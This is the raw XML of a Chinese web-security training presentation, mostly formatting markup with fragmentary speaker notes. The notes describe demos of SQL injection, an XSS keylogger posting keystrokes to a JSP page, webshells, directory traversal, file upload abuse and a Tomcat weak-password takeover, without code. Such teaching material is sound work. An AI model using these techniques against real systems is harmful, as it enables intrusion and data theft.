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7" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="264" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="329" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266"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6" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="288" r:id="rId34"/>
    <p:sldId id="289" r:id="rId35"/>
    <p:sldId id="290" r:id="rId36"/>
    <p:sldId id="291" r:id="rId37"/>
    <p:sldId id="292" r:id="rId38"/>
    <p:sldId id="293" r:id="rId39"/>
    <p:sldId id="327" r:id="rId40"/>
    <p:sldId id="294" r:id="rId41"/>
    <p:sldId id="295" r:id="rId42"/>
    <p:sldId id="297" r:id="rId43"/>
    <p:sldId id="298" r:id="rId44"/>
    <p:sldId id="299" r:id="rId45"/>
    <p:sldId id="300" r:id="rId46"/>
    <p:sldId id="301" r:id="rId47"/>
    <p:sldId id="302" r:id="rId48"/>
    <p:sldId id="303" r:id="rId49"/>
    <p:sldId id="304" r:id="rId50"/>
    <p:sldId id="305" r:id="rId51"/>
    <p:sldId id="306" r:id="rId52"/>
    <p:sldId id="308" r:id="rId53"/>
    <p:sldId id="309" r:id="rId54"/>
    <p:sldId id="307" r:id="rId55"/>
    <p:sldId id="310" r:id="rId56"/>
    <p:sldId id="312" r:id="rId57"/>
    <p:sldId id="313" r:id="rId58"/>
    <p:sldId id="314" r:id="rId59"/>
    <p:sldId id="317" r:id="rId60"/>
    <p:sldId id="318" r:id="rId61"/>
    <p:sldId id="319" r:id="rId62"/>
    <p:sldId id="320" r:id="rId63"/>
    <p:sldId id="322" r:id="rId64"/>
    <p:sldId id="323" r:id="rId65"/>
    <p:sldId id="324" r:id="rId66"/>
    <p:sldId id="325" r:id="rId67"/>
    <p:sldId id="326"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1" autoAdjust="0"/>
    <p:restoredTop sz="89307" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="1016" y="2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8CC5C-EBE9-4E67-94D1-E47747475529}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/13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3ACB2-8F82-4C16-B6B5-943E5A41C5E0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97429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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配合感谢</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>交流更方便</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>减轻量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884608" y="8685208"/>
            <a:ext cx="2971800" cy="457200"/>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68FA785-9CFF-429B-BD06-79630B5F3CEF}" type="slidenum">
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2155922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基本可以判定注入，因为插入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句被执行了。</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4132695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显示正常则表示正确。</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4286014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切换到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2622630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一般是不会使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句的，为了演示方便</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3167951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差一张图，补上</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120324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数量和字段</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505988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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3744851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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252278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Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>监听键盘事件，然后将接收到的按键信息发送给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>keylogger.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>处理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会将信息写入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>tex.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文本文档中。</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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2343454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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152504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定义都是很抽象，有具体演示的。</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3137274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这看起来没有什么问题，但是此时如果输入用户名和密码，就会被攻击者所截获。</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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2013374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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1379505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第一种如果仅仅验证域名可能有被绕过的风险，</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4195734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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312393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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3130870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可以执行操作系统命令，浏览修改下载上传文件。所以一定不要使用管理员权限跑服务。</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3033562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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622033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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622033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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622033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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312393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593ACB2-8F82-4C16-B6B5-943E5A41C5E0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1487384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打开一个文件管理器，在目录后面加上一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>演示一下。</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365745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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1954067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54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312393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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2443719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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3621996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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2319198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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4112599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59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228365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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>k8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具，上传一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。成功</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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739604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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>k8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具，上传一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，失败。</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844297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软件漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般都是使程序进程异常崩溃。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序功能造成影响。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这就和功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>看起来很像了。</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352629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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2759801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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1127665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一台沦陷，作为跳板到了内网，全部沦陷。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序可以获得到服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>管理界面弱口令演示危害。</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64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1888058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65</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3139263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66</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375817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书，业务时间兴趣爱好即可。</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15533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书，业务时间兴趣爱好即可。</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15533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然后变了这样</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>差图，补上</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="526560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数量众多，危害巨大。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息泄露事件，很多都是因为该漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Zf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网站，数据真实敏感，诈骗事件</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621935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脱裤：数据库是大多厂商最重要的东西，数据库泄露了等于和人没穿裤子一样。恶趣味。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E593ACB2-8F82-4C16-B6B5-943E5A41C5E0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1918401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C39F1B9-8099-4D59-9690-86E2C2F9D0F4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
